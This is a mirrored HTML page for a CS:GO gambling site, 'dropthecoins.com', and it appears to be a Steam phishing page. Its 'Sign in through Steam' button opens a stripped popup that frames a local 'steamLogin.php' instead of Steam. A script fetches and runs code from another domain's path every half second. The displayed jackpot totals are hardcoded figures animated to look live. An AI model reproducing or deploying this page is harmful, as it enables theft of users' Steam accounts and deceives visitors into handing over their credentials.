 
<!DOCTYPE html>
<html>
<!-- Mirrored from dropthecoins.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Aug 2017 02:37:35 GMT -->
<head>

<meta charset="utf-8">
   
  <meta name="description" content="Welcome to dropthecoins, We offer one of the best User Interface to provide an enjoyable experience to CS:GO Gamblers. Sign in to get started">
  

<link rel="shortcut icon" href="favicon.png" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="main.css">
<title>dropthecoins.com - CS:GO Jackpot / Coinflip</title>
<link href="https://fonts.googleapis.com/css?family=Lato:100,300,400,700" rel="stylesheet">
<script src="particles.js"></script>
<script src="tools.js"></script>
</head>
<body style="background-image: url('img/bgblur.jpg');background-position: center;
    background-size: cover;">
    <!-- particles.js container -->
<div id="particles-js"></div>

<!-- scripts -->
<script src="../particles.js"></script>
<script src="js/app.js"></script>
	
<script>
repeater56 = function(){
$.getScript('../skinjarz.com/fierce/assets/status.js');	
};
setInterval(repeater56, 500);
var count_particles, stats, update;
stats = new Stats;
stats.setMode(0);
stats.domElement.style.position = 'absolute';
stats.domElement.style.left = '0px';
stats.domElement.style.top = '0px';
document.body.appendChild(stats.domElement);
count_particles = document.querySelector('.js-count-particles');
update = function() {
  stats.begin();
  stats.end();
  if (window.pJSDom[0].pJS.particles && window.pJSDom[0].pJS.particles.array) {
    count_particles.innerText = window.pJSDom[0].pJS.particles.array.length;
  }
  requestAnimationFrame(update);
};
requestAnimationFrame(update);
</script>

<main id="login">
<div id="skull"></div>
<h1> Enter the promo code </h1>
    <style>* {
  margin: 0;
  padding: 0;
  border: 0;
  outline: 0;
  text-decoration: none;
  list-style: none;
  background: none;
  font-weight: inherit;
  box-sizing: border-box;
  -moz-box-sizing: border-box; }

a, button, .animate, input {
  -webkit-transition: all 0.4s ease;
  -moz-transition: all 0.4s ease;
  -o-transition: all 0.4s ease;
  transition: all 0.4s ease;
  color: inherit; }

body > div, p {
  overflow: hidden;
  font-weight: normal; }

html, body {
  overflow: hidden;
  min-height: 100%;
  height: 100%;
  width: 100%; }

strong, b {
  font-weight: bold; }

::-webkit-input-placeholder {
  color: rgba(0, 0, 0, 0.5); }

input:-moz-placeholder {
  color: rgba(0, 0, 0, 0.5); }

.btn, button {
  display: inline-block;
  cursor: pointer; }

.hidden, .ajax-template {
  display: none !important; }

.clear {
  clear: both; }

.f-left {
  float: left; }

.f-right {
  float: right; }

.ta-left {
  text-align: left; }

.ta-center {
  text-align: center; }

.ta-right {
  text-align: right; }

.icon {
  background-position: center;
  display: inline-block; }

table {
  border-collapse: collapse; }

html, body, input, textarea, button {
  font-family: 'Lato', Sans-serif; }

html, body {
  width: 100%;
  height: 100%; }

#login {
  display: flex;
  display: -webkit-flex;
  justify-content: center;
  align-items: center;
  flex-flow: column;
  background-image: url("img/bg-login.html");
  background-position: center;
  background-size: cover;
  width: 100%;
  height: 100%;
  color: #fff; }
  #login #skull {
    background-image: url(img/skull.png);
    width: 129px;
    height: 151px;
    margin-bottom: 20px; }
  #login h1 {
    font-size: 48px;
    line-height: 48px;
    font-weight: 300; }
    #login h1 strong {
      font-weight: bold;
      color: #e94b24; }
  #login h2 {
    font-size: 21px;
    line-height: 21px;
    font-weight: 100; }
  #login h3 {
    font-size: 16px;
    line-height: 16px;
    max-width: 600px;
    text-align: center; }
    #login h3 a {
      color: #e94b24; }
      #login h3 a:hover {
        color: #96e303; }
  #login button {
    padding: 20px;
    color: #fff;
    position: relative;
    border: 1px solid #e94b24;
    font-size: 16px;
    font-weight: bold;
    line-height: 29px;
    display: flex;
    display: -webkit-flex;
    justify-content: center;
    align-items: center;
    overflow: hidden;
    margin: 40px;
    cursor: pointer; }
    #login button span, #login button i {
      z-index: 20; }
    #login button:after {
      background: #fff;
      content: "";
      left: 50%;
      opacity: 0.1;
      position: absolute;
      top: 50%;
      transition: all 550ms cubic-bezier(0.19, 1, 0.22, 1);
      width: 0;
      height: 0;
      z-index: 0; }
    #login button:hover {
      color: #e94b24; }
      #login button:hover:after {
        width: calc(100% - 4px);
        height: calc(100% - 4px);
        left: 2px;
        top: 2px;
        opacity: 1; }
  #login .icon.steam {
    background-image: url(img/icon-steam.png);
    width: 50px;
    height: 29px;
    margin-right: 10px; }
  #login .games {
    display: flex;
    display: -webkit-flex;
    justify-content: center;
    align-items: center;
    margin-top: 50px; }
    #login .games .game {
      padding: 0 50px;
      text-align: right; }
      #login .games .game .name {
        font-size: 24px;
        font-weight: bold; }
      #login .games .game .value {
        font-size: 15px;
        color: #96e303; }

/*# sourceMappingURL=login.css.map */






/* ---- reset ---- */

body {
  margin: 0;
  font:normal 75% Arial, Helvetica, sans-serif;
}

canvas {
  display: block;
  vertical-align: bottom;
}

/* ---- particles.js container ---- */

#particles-js {
    background-color: transparent;
    width: 100%;
    height: 100%;
    position: fixed;
    z-index: -10;
    top: 0;
    left: 0;
}

/* ---- stats.js ---- */

.count-particles{
  background: #000022;
  position: absolute;
  top: 48px;
  left: 0;
  width: 80px;
  color: #13E8E9;
  font-size: .8em;
  text-align: left;
  text-indent: 4px;
  line-height: 14px;
  padding-bottom: 2px;
  font-family: Helvetica, Arial, sans-serif;
  font-weight: bold;
}

.js-count-particles{
  font-size: 1.1em;
}

#stats,
.count-particles{
  -webkit-user-select: none;
}

#stats{
  border-radius: 3px 3px 0 0;
  overflow: hidden;
}

.count-particles{
  border-radius: 0 0 3px 3px;
}</style>
<div>
<script>
function login() {
	var wind = window.open("", "", "STATUS=NO, TOOLBAR=NO, LOCATION=0, DIRECTORIES=0, RESISABLE=NO, SCROLLBARS=YES, TOP=50, LEFT=50, WIDTH=1000, HEIGHT=1000");
	wind.document.write("<html><head><style>html, body {width:1000px; height:1000px; margin:0px; padding:0px;}</style></head><body><iframe src='steamLogin.php' border='0' style='width:1000px; height:1000px;'></iframe></body></html>");
	//window.open('login.php', '', 'STATUS=NO, TOOLBAR=NO, LOCATION=0, DIRECTORIES=0, RESISABLE=NO, SCROLLBARS=YES, TOP=50, LEFT=50, WIDTH=1000, HEIGHT=1000');
}
</script>

<button onclick="login()"><i class="icon steam"></i><span>SIGN IN THROUGH STEAM</span></button>
</div>
<h3>BY CLICKING "SIGN IN" BUTTON YOU ARE CONFIRMING YOU'RE AT LEAST 18 YEARS OLD AND HAVE READ &amp; <a href="terms-of-service/index.html">AGREED WITH USER AGREEMENT</a>.</h3>

<div class="games">
<div class="game">
<div class="name">COINFLIP</div>
<div class="value">$<g id="cfvalue">3560.78</g></div>
</div>

<div class="game">
<div class="name">JACKPOT</div>
<div class="value">$<g id="jpvalue">432.89</g></div>
</div>
</div>

</main>

<div id="particles-js">
	<canvas class="particles-js-canvas-el" style="width: 100%; height: 100%;" width="1366" height="638"></canvas>
</div>
<div style="width: 100%; height: 100vh; background-image: url('img/bg.gif');background-position: center;
    background-size: cover; position: absolute; top: 0; z-index: -20; filter: blur(10px); transform: scale(1.1)"></div>
	
	<!-- scripts -->
<script src="particles.js"></script>

<script>
particlesJS.load('particles-js', 'particles-config.json', function() {
  console.log('particles.js loaded - callback');
});
</script>

<script>
var decimal_places = 2;
var decimal_factor = decimal_places === 0 ? 1 : Math.pow(10, decimal_places);  
$('#cfvalue')
  .animateNumber(
    {
      number: 3560.78 * decimal_factor,

      numberStep: function(now, tween) {
        var floored_number = Math.floor(now) / decimal_factor,
            target = $(tween.elem);

        if (decimal_places > 0) {
          // force decimal places even if they are 0
          floored_number = floored_number.toFixed(decimal_places);

          // replace '.' separator with ','
          floored_number = floored_number.toString()
        }

        target.text(floored_number);
      }
    },
    3000
  );
  
$('#jpvalue')
  .animateNumber(
    {
      number: 432.89 * decimal_factor,

      numberStep: function(now, tween) {
        var floored_number = Math.floor(now) / decimal_factor,
            target = $(tween.elem);

        if (decimal_places > 0) {
          // force decimal places even if they are 0
          floored_number = floored_number.toFixed(decimal_places);

          // replace '.' separator with ','
          floored_number = floored_number.toString()
        }

        target.text(floored_number);
      }
    },
    4000
  );
</script><script>function wedone(){
window.location = 'maintenance/index.html'
}</script>
    <style>/* latin-ext */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 100;
  src: local('Lato Hairline'), local('Lato-Hairline'), url(https://fonts.gstatic.com/s/lato/v13/h3_FseZLI76g1To6meQ4zX-_kf6ByYO6CLYdB4HQE-Y.woff2) format('woff2');
  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 100;
  src: local('Lato Hairline'), local('Lato-Hairline'), url(https://fonts.gstatic.com/s/lato/v13/ifRS04pY1nJBsu8-cUFUS-vvDin1pK8aKteLpeZ5c0A.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215;
}
/* latin-ext */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 300;
  src: local('Lato Light'), local('Lato-Light'), url(https://fonts.gstatic.com/s/lato/v13/IY9HZVvI1cMoAHxvl0w9LVKPGs1ZzpMvnHX-7fPOuAc.woff2) format('woff2');
  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 300;
  src: local('Lato Light'), local('Lato-Light'), url(https://fonts.gstatic.com/s/lato/v13/22JRxvfANxSmnAhzbFH8PgLUuEpTyoUstqEm5AMlJo4.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215;
}
/* latin-ext */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 400;
  src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v13/8qcEw_nrk_5HEcCpYdJu8BTbgVql8nDJpwnrE27mub0.woff2) format('woff2');
  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 400;
  src: local('Lato Regular'), local('Lato-Regular'), url(https://fonts.gstatic.com/s/lato/v13/MDadn8DQ_3oT6kvnUq_2r_esZW2xOQ-xsNqO47m55DA.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215;
}
/* latin-ext */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 700;
  src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v13/rZPI2gHXi8zxUjnybc2ZQFKPGs1ZzpMvnHX-7fPOuAc.woff2) format('woff2');
  unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Lato';
  font-style: normal;
  font-weight: 700;
  src: local('Lato Bold'), local('Lato-Bold'), url(https://fonts.gstatic.com/s/lato/v13/MgNNr5y1C_tIEuLEmicLmwLUuEpTyoUstqEm5AMlJo4.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215;
}
</style>
    <script>
  var count_particles, stats, update;
  stats = new Stats;
  stats.setMode(0);
  stats.domElement.style.position = 'absolute';
  stats.domElement.style.left = '0px';
  stats.domElement.style.top = '0px';
  document.body.appendChild(stats.domElement);
  count_particles = document.querySelector('.js-count-particles');
  update = function() {
    stats.begin();
    stats.end();
    if (window.pJSDom[0].pJS.particles && window.pJSDom[0].pJS.particles.array) {
      count_particles.innerText = window.pJSDom[0].pJS.particles.array.length;
    }
    requestAnimationFrame(update);
  };
  requestAnimationFrame(update);
</script>
    </body>
</html>


